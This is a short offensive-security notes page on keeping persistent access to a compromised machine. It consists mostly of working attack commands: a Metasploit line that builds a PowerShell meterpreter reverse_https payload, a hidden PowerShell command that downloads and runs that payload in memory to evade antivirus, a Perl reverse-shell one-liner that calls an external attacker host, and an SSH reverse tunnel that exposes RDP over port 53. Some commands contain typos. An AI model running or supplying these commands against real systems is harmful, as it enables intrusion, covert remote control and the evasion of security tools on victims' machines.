Maintaining access (Phase 4)
Below are some ideas (and exploits found in the wild) that should get you on the right track of how to establish a persitsant access
Use powershell to download and execute a meterpreter shell from your external server
1. use metasploit to create your powershell, which you put on your external server
msfpayload windows/meterpreter/reverse_https LHOST=[external attack helper] LPORT=443 R | msfencode -t psh -a x86 >blabla
2. place the file "blabla" onto the root of the webserver of your external attack helper
3. start an multihandler to accept your incomming reverse shell from the victim
msf > use exploit/multi/handler
4. Use a powershell instance to download and run your reverse shell in the memory of your victim (avoiding AV detections)
powershell.exe -w hidden -nop -c "IEX ((new-object net.webclient).downloadstring('http://[external attack helper]:80/blabla'))"
Now just wait for the victim to connect back to your external attack helper ...
Use below perl command to establish a reverse Shell Connection on port 443
perl -e 'use Socket;$i="[external attack helper]";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Create an ssh tunnel between your victim and the external attack helper:
1. victim: Redirects RDP (:3389) via port 53 to the external attacker helper
ssh [external attack helper] -p 53 -;R 3390:127.0.01:3389
2. external attack helper: uses the tunnel to connect back to the victim
redesktop 127.0.0.1:3390